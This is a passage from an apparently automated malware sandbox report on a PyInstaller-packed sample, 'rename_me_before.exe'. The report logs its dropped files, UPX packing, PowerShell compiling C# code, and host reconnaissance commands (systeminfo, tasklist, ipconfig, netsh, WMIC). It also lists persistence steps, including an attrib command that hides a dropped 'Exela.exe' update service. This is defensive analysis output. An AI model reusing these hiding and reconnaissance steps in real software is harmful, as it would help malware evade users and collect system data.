            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
            Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: rename_me_before.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: rename_me_before.exeStatic file information: File size 11803970 > 1048576
            Source: rename_me_before.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: rename_me_before.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: rename_me_before.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: rename_me_before.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: rename_me_before.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: rename_me_before.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: rename_me_before.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: rename_me_before.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.pdb source: powershell.exe, 00000045.00000002.1826414031.000001DBC0644000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, _uuid.pyd.0.dr
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.pdbhP source: powershell.exe, 00000045.00000002.1826414031.000001DBC0644000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \ia.pdbc source: powershell.exe, 00000045.00000002.1848424397.000001DBD74B3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: rename_me_before.exe, 00000000.00000003.1659342426.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, VCRUNTIME140.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: rename_me_before.exe, 00000000.00000003.1659342426.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, VCRUNTIME140.dll.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981233285.000001B17FDC0000.00000002.00000001.01000000.00000006.sdmp
            Source: rename_me_before.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: rename_me_before.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: rename_me_before.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: rename_me_before.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: rename_me_before.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline"
            Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
            Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
            Source: _rust.pyd.0.drStatic PE information: section name: UPX2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 69_2_00007FFD99D509A2 pushad ; ret 69_2_00007FFD99D50AE2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 69_2_00007FFD99D500BD pushad ; iretd 69_2_00007FFD99D500C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 69_2_00007FFD99D56329 push ecx; ret 69_2_00007FFD99D5632C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 69_2_00007FFD99D50695 push edx; ret 69_2_00007FFD99D5065A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 69_2_00007FFD99D50A60 pushad ; ret 69_2_00007FFD99D50AE2
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1

            Persistence and Installation Behavior

            barindex
            Uses attrib.exe to hide files
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Uses cmd line tools excessively to alter registry or file data
            Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: attrib.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
            Uses ipconfig to lookup or modify the Windows network settings
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\libffi-8.dllJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\frozenlist\_frozenlist.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_websocket.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_socket.pydJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.dllJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_cffi_backend.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_parser.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\libcrypto-3.dllJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_helpers.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\python311.dllJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\multidict\_multidict.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp\_http_writer.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\yarl\_quoting_c.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\libssl-3.dllJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI13962\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\rename_me_before.exeFile created: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeJump to dropped file
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404E6EA0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00007FF6404E6EA0
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
